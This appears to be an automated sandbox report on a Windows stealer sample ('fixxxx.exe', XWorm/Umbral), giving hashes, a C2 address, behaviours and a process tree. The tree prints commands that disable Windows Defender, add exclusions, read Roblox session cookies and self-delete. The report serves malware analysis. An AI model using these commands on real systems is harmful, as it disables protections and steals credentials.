Analysis
-
max time kernel
143s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
02-07-2024 15:07
Static task
static1
Behavioral task
behavioral1
Sample
fixxxx.exe
Resource
win7-20240220-en
General
-
Target
fixxxx.exe
-
Size
1.1MB
-
MD5
656c98a712018e49c94e823f1f30d038
-
SHA1
f7400c9f13174b924c822871053fb1efa97a43b6
-
SHA256
136cec1df46a4a97e2358e7b1ddcca2ec2853ecad6e004cbd959844d1e96d0e0
-
SHA512
300b82e08c08391a369706a77907471527a6325909f64ed9c6e316b89f3e0659ddc0619bba1ee857f2b2a14865b3248161079e066ea6f3d6d340617f56a6a068
-
SSDEEP
24576:Ut9UwrSmTCEu3LIy+PtTFngKrh67y8pWaUTNTfkROL6bE:C9PWDIB5Fnfrx8W1hn/
Malware Config
Extracted
xworm
20.ip.gl.ply.gg:53765
-
Install_directory
%AppData%
-
install_file
svchost.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral2/files/0x000300000001e886-141.dat family_umbral behavioral2/memory/760-148-0x000001F72C7F0000-0x000001F72C830000-memory.dmp family_umbral -
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/5076-2-0x0000000000F30000-0x00000000012A4000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2248 powershell.exe 4584 powershell.exe 2792 powershell.exe 5008 powershell.exe 3300 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts ffpint.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation fixxxx.exe -
Executes dropped EXE 1 IoCs
pid Process 760 ffpint.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" fixxxx.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 69 discord.com 70 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 66 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 5076 fixxxx.exe 5076 fixxxx.exe 5076 fixxxx.exe 5076 fixxxx.exe 5076 fixxxx.exe 5076 fixxxx.exe 5076 fixxxx.exe 5076 fixxxx.exe 5076 fixxxx.exe 5076 fixxxx.exe 5076 fixxxx.exe 5076 fixxxx.exe 5076 fixxxx.exe 5076 fixxxx.exe 5076 fixxxx.exe 5076 fixxxx.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4504 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4812 PING.EXE -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 5008 powershell.exe 5008 powershell.exe 5008 powershell.exe 3300 powershell.exe 3300 powershell.exe 3300 powershell.exe 2248 powershell.exe 2248 powershell.exe 2248 powershell.exe 4584 powershell.exe 4584 powershell.exe 4584 powershell.exe 2792 powershell.exe 2792 powershell.exe 2792 powershell.exe 3092 powershell.exe 3092 powershell.exe 3092 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 4104 powershell.exe 4104 powershell.exe 4104 powershell.exe 4800 powershell.exe 4800 powershell.exe 4800 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5076 fixxxx.exe Token: SeDebugPrivilege 5008 powershell.exe Token: SeDebugPrivilege 3300 powershell.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeDebugPrivilege 4584 powershell.exe Token: SeDebugPrivilege 5076 fixxxx.exe Token: SeDebugPrivilege 760 ffpint.exe Token: SeDebugPrivilege 2792 powershell.exe Token: SeDebugPrivilege 3092 powershell.exe Token: SeDebugPrivilege 728 powershell.exe Token: SeDebugPrivilege 4104 powershell.exe Token: SeIncreaseQuotaPrivilege 3592 wmic.exe Token: SeSecurityPrivilege 3592 wmic.exe Token: SeTakeOwnershipPrivilege 3592 wmic.exe Token: SeLoadDriverPrivilege 3592 wmic.exe Token: SeSystemProfilePrivilege 3592 wmic.exe Token: SeSystemtimePrivilege 3592 wmic.exe Token: SeProfSingleProcessPrivilege 3592 wmic.exe Token: SeIncBasePriorityPrivilege 3592 wmic.exe Token: SeCreatePagefilePrivilege 3592 wmic.exe Token: SeBackupPrivilege 3592 wmic.exe Token: SeRestorePrivilege 3592 wmic.exe Token: SeShutdownPrivilege 3592 wmic.exe Token: SeDebugPrivilege 3592 wmic.exe Token: SeSystemEnvironmentPrivilege 3592 wmic.exe Token: SeRemoteShutdownPrivilege 3592 wmic.exe Token: SeUndockPrivilege 3592 wmic.exe Token: SeManageVolumePrivilege 3592 wmic.exe Token: 33 3592 wmic.exe Token: 34 3592 wmic.exe Token: 35 3592 wmic.exe Token: 36 3592 wmic.exe Token: SeIncreaseQuotaPrivilege 3592 wmic.exe Token: SeSecurityPrivilege 3592 wmic.exe Token: SeTakeOwnershipPrivilege 3592 wmic.exe Token: SeLoadDriverPrivilege 3592 wmic.exe Token: SeSystemProfilePrivilege 3592 wmic.exe Token: SeSystemtimePrivilege 3592 wmic.exe Token: SeProfSingleProcessPrivilege 3592 wmic.exe Token: SeIncBasePriorityPrivilege 3592 wmic.exe Token: SeCreatePagefilePrivilege 3592 wmic.exe Token: SeBackupPrivilege 3592 wmic.exe Token: SeRestorePrivilege 3592 wmic.exe Token: SeShutdownPrivilege 3592 wmic.exe Token: SeDebugPrivilege 3592 wmic.exe Token: SeSystemEnvironmentPrivilege 3592 wmic.exe Token: SeRemoteShutdownPrivilege 3592 wmic.exe Token: SeUndockPrivilege 3592 wmic.exe Token: SeManageVolumePrivilege 3592 wmic.exe Token: 33 3592 wmic.exe Token: 34 3592 wmic.exe Token: 35 3592 wmic.exe Token: 36 3592 wmic.exe Token: SeIncreaseQuotaPrivilege 1692 wmic.exe Token: SeSecurityPrivilege 1692 wmic.exe Token: SeTakeOwnershipPrivilege 1692 wmic.exe Token: SeLoadDriverPrivilege 1692 wmic.exe Token: SeSystemProfilePrivilege 1692 wmic.exe Token: SeSystemtimePrivilege 1692 wmic.exe Token: SeProfSingleProcessPrivilege 1692 wmic.exe Token: SeIncBasePriorityPrivilege 1692 wmic.exe Token: SeCreatePagefilePrivilege 1692 wmic.exe Token: SeBackupPrivilege 1692 wmic.exe Token: SeRestorePrivilege 1692 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5076 fixxxx.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 5076 wrote to memory of 5008 5076 fixxxx.exe 93 PID 5076 wrote to memory of 5008 5076 fixxxx.exe 93 PID 5076 wrote to memory of 5008 5076 fixxxx.exe 93 PID 5076 wrote to memory of 3300 5076 fixxxx.exe 101 PID 5076 wrote to memory of 3300 5076 fixxxx.exe 101 PID 5076 wrote to memory of 3300 5076 fixxxx.exe 101 PID 5076 wrote to memory of 2248 5076 fixxxx.exe 105 PID 5076 wrote to memory of 2248 5076 fixxxx.exe 105 PID 5076 wrote to memory of 2248 5076 fixxxx.exe 105 PID 5076 wrote to memory of 4584 5076 fixxxx.exe 109 PID 5076 wrote to memory of 4584 5076 fixxxx.exe 109 PID 5076 wrote to memory of 4584 5076 fixxxx.exe 109 PID 5076 wrote to memory of 760 5076 fixxxx.exe 116 PID 5076 wrote to memory of 760 5076 fixxxx.exe 116 PID 760 wrote to memory of 4312 760 ffpint.exe 117 PID 760 wrote to memory of 4312 760 ffpint.exe 117 PID 760 wrote to memory of 2792 760 ffpint.exe 119 PID 760 wrote to memory of 2792 760 ffpint.exe 119 PID 760 wrote to memory of 3092 760 ffpint.exe 121 PID 760 wrote to memory of 3092 760 ffpint.exe 121 PID 760 wrote to memory of 728 760 ffpint.exe 123 PID 760 wrote to memory of 728 760 ffpint.exe 123 PID 760 wrote to memory of 4104 760 ffpint.exe 125 PID 760 wrote to memory of 4104 760 ffpint.exe 125 PID 760 wrote to memory of 3592 760 ffpint.exe 127 PID 760 wrote to memory of 3592 760 ffpint.exe 127 PID 760 wrote to memory of 1692 760 ffpint.exe 129 PID 760 wrote to memory of 1692 760 ffpint.exe 129 PID 760 wrote to memory of 3868 760 ffpint.exe 131 PID 760 wrote to memory of 3868 760 ffpint.exe 131 PID 760 wrote to memory of 4800 760 ffpint.exe 133 PID 760 wrote to memory of 4800 760 ffpint.exe 133 PID 760 wrote to memory of 4504 760 ffpint.exe 135 PID 760 wrote to memory of 4504 760 ffpint.exe 135 PID 760 wrote to memory of 2072 760 ffpint.exe 137 PID 760 wrote to memory of 2072 760 ffpint.exe 137 PID 2072 wrote to memory of 4812 2072 cmd.exe 139 PID 2072 wrote to memory of 4812 2072 cmd.exe 139 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4312 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fixxxx.exe"C:\Users\Admin\AppData\Local\Temp\fixxxx.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fixxxx.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5008
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fixxxx.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3300
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
C:\Users\Admin\AppData\Local\Temp\ffpint.exe"C:\Users\Admin\AppData\Local\Temp\ffpint.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\ffpint.exe"3⤵
- Views/modifies file attributes
PID:4312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ffpint.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4104
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3592
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:3868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4800
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:4504
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\ffpint.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:4812
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4304,i,12594301322143882025,16832588342008839449,262144 --variations-seed-version --mojo-platform-channel-handle=4028 /prefetch:81⤵PID:532
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD53fecd1326c915ca032563f4f83816aa5
SHA1332cb8f3d6f14fb1edd6633c5ea9db4cbdf25e8a
SHA25636ff8c992d3a74ece29b1c001c75fe9512fadd5dc577799bd7b6635ea3314d91
SHA512d2fea658ba679958a5a739013c092bc95bf70cb7e33093043b959bd743021a18ebc648114aba5c30fb960e3dd9869800a4c445b3ec90ad7d64380565030c55f8
-
Filesize
18KB
MD56c0faf4d2b068a1b9fabd11b525e0118
SHA1e6eb5b232cbb9ef0ffdae6203b8959661fd255b9
SHA25669fd471d7a5121390ed18b236e47e4c4860c27805878ee5da94017ee2c853177
SHA5128c487bba3518e9876107c0461c48b2cacabd68ec30d84abbaeefe83ce335f9452fc7efb63a7fef4ee7a0aab4ebc6232e3a0a0d697278ad566d8260ac712b45be
-
Filesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
Filesize
948B
MD56a29e9f9eb72c3bffbb054cd27e3ceea
SHA1d38f7c2ad68dcf1d24deca9792256ff53d5218b2
SHA2567a9f831f96b9e4843751dea3ed57ee11d70bb83a5970ddf9d6bd440f4def442c
SHA512b4826f172c6ac60ad17412a634987c45640b1b8fe03aecba26510ae224685bcd571bc4b131724036e2b502b3a8198fb69414be8c72e46f833f0601a15d313430
-
Filesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
Filesize
1KB
MD52984662ba3f86d7fcf26758b5b76754d
SHA1bc2a43ffd898222ee84406313f3834f226928379
SHA256f0815f797b0c1829745dd65985f28d459688f91ceb2f3d76fed2d4309589bcde
SHA512a06251a7a14559ebf5627a3c6b03fda9ded1d4ee44991283c824ccf5011cdf67665696d2d9b23507cbb3e3b9943b9e9f79ef28d3657eb61fb99920225417ab11
-
Filesize
18KB
MD5047a6ace681f0332f50f9b733a4e5636
SHA17832a9382a86b8750252589f36332c93d220c002
SHA256da4fccf3ae205aa090b0efe062dd5735a29669baa8ae1f5b7ad1c25f6c342a45
SHA51252a47c740b5216b573caaca77b10a5db9d1a2b12cc84aacf54ec3f50ee633836ee834fcc1256de3765cd0fd863482fa2eb7d4275f2d3bc47a33a537946287001
-
Filesize
18KB
MD50b95e5770936c502a42368f9b060d6e5
SHA1ad12ff207a4722daf40314fa07a33e9469cff7f0
SHA256c7b88ad95b501873d8fcbc6f8cccf3ec4e9c0e5e2cda918d72e95d49d7e4652a
SHA512bdddb979d191210224918403a6980fa9f13eb48200fc1a6000a1917b8694926e8468acad4ed6782754dee602595855ab86a40ead9e5ba6603d438dc3a1911eea
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
231KB
MD5cc9a35c145b9603d30c07fa7995390ea
SHA1e4dd1a40aa0e5a1a7cfae14e76ebab05d51a0b69
SHA2568a18073f8f287ccd1f0cf93ae325e84426073bfd07593ea736e7ec0bb9a35efe
SHA512ee8145b5927c8395455a3ed7bf4f557a66035bdb7354d519045c51ce44a9b39922fa7b2288a6694cbc2a542c2f623ef309ff4d3f5029aea6ee94b9f005120b95